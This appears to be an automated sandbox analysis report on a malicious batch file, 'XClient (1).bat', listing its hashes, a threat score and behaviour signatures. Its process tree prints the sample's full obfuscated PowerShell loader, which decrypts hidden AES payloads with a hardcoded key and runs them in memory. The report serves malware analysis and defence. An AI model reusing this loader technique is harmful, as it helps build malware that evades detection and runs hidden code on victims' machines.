07/11/2024, 23:56
241107-3zdm8a1aml 10
Analysis
max time kernel: 122s
max time network: 130s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 07/11/2024, 23:56
Static task: static1
Behavioral task: behavioral1
Sample: XClient (1).bat
Resource: win7-20240903-en
4 signatures
150 seconds
General
Target: XClient (1).bat
Size: 72KB
MD5: 73585d18685e06c4f21302c275ca6682
SHA1: dd0bae964a108a1c923a1f9b99e72f82064786dd
SHA256: b953aae6b09f2002ca056f6cef521960a91711152d5ebd5cf0055d9a491a5554
SHA512: 00b2276e24b96b9b8c0629a1913f8a1c0ee7ab12e2fa4ce8f9b54fabeb02b0383eb183b1d45f16e86175108a9c7990f40a4671e29a2dde8400dbb60d3974b08a
SSDEEP: 1536:PhOHtmQQ2yEPUWKzKbYd1P/OCWA7Vm6H/j5z5y3Wdjyh:YvTMKY1OCF0xWV+
Score: 8/10
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.
pid 2412, Process powershell.exe
Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid 2412, Process powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2412 | powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
description | pid | Process | procid_target
PID 2916 wrote to memory of 2412 | 2916 | cmd.exe | 31
PID 2916 wrote to memory of 2412 | 2916 | cmd.exe | 31
PID 2916 wrote to memory of 2412 | 2916 | cmd.exe | 31
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\XClient (1).bat"
Suspicious use of WriteProcessMemory
PID: 2916
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lt7J5oQYvdPE/yPR3udzzOgcuFCXB9kkjS82/1mR/YU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FE87bzzPEJCKUD9ywpxuRA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WEOQY=New-Object System.IO.MemoryStream(,$param_var); $YzqMc=New-Object System.IO.MemoryStream; $DahLb=New-Object System.IO.Compression.GZipStream($WEOQY, [IO.Compression.CompressionMode]::Decompress); $DahLb.CopyTo($YzqMc); $DahLb.Dispose(); $WEOQY.Dispose(); $YzqMc.Dispose(); $YzqMc.ToArray();}function execute_function($param_var,$param2_var){ $RqagN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HUCEB=$RqagN.EntryPoint; $HUCEB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient (1).bat';$qvcZY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient (1).bat').Split([Environment]::NewLine);foreach ($zHSKO in $qvcZY) { if ($zHSKO.StartsWith(':: ')) { $VrWEJ=$zHSKO.Substring(3); break; }}$payloads_var=[string[]]$VrWEJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  Command and Scripting Interpreter: PowerShell
  Suspicious behavior: EnumeratesProcesses
  Suspicious use of AdjustPrivilegeToken
  PID: 2412